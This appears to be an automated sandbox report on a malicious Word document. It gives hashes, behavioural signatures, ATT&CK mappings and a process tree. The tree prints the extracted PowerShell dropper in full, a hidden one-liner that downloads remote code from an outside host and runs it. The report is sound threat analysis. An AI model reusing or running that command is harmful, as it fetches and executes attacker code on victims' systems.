68238802bf5eb3900f9be03eda70dbf4cf95522d7c54f6d153ef8edaf9dca401

General

Target

68238802bf5eb3900f9be03eda70dbf4cf95522d7c54f6d153ef8edaf9dca401.doc
Size

32KB
MD5

50e418fbf365040c4de7e2ac2159472a
SHA1

47c814b27ead61337da3fb4d0f9e9bd29ed3711c
SHA256

68238802bf5eb3900f9be03eda70dbf4cf95522d7c54f6d153ef8edaf9dca401
SHA512

9f55ce9ab84b77cd6798753d853f049f1a0ffa8d251c8ab4a30c4dfc02206451988dc881cbfeb3d1cdf994d14732325cdeee408fb72229d4caed1727c269282b
SSDEEP

384:h+8iSwvxjk+t+lrqrXdbXdCRJg0jEc6tu:hMxw+tYsJEMS

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.168.45.199/health

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2768	2684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2768 powershell.exe

pid	process
2768	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

WINWORD.EXE

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2280 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2768 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2768 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2280 WINWORD.EXE
2280 WINWORD.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

pid	process
2280	WINWORD.EXE

pid	process
2768	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2768	powershell.exe

pid	process
2280	WINWORD.EXE
2280	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2280 wrote to memory of 2976	2280	WINWORD.EXE	splwow64.exe
PID 2280 wrote to memory of 2976	2280	WINWORD.EXE	splwow64.exe
PID 2280 wrote to memory of 2976	2280	WINWORD.EXE	splwow64.exe
PID 2280 wrote to memory of 2976	2280	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\68238802bf5eb3900f9be03eda70dbf4cf95522d7c54f6d153ef8edaf9dca401.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://192.168.45.199/health'))
1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2280-32-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-5-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-0-0x000000002FFC1000-0x000000002FFC2000-memory.dmp

Filesize
4KB

Download
memory/2280-11-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-25-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-10-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-59-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-58-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-57-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-56-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-55-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-21-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-53-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-39-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2280-2-0x000000007183D000-0x0000000071848000-memory.dmp

Filesize
44KB

Download
memory/2280-54-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-20-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-18-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-9-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-8-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-7-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-6-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-46-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-4-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-72-0x00000000004E0000-0x00000000005E0000-memory.dmp

Filesize
1024KB

Download
memory/2280-71-0x000000007183D000-0x0000000071848000-memory.dmp

Filesize
44KB

Download
memory/2768-66-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2768-65-0x000000001B430000-0x000000001B712000-memory.dmp

Filesize
2.9MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads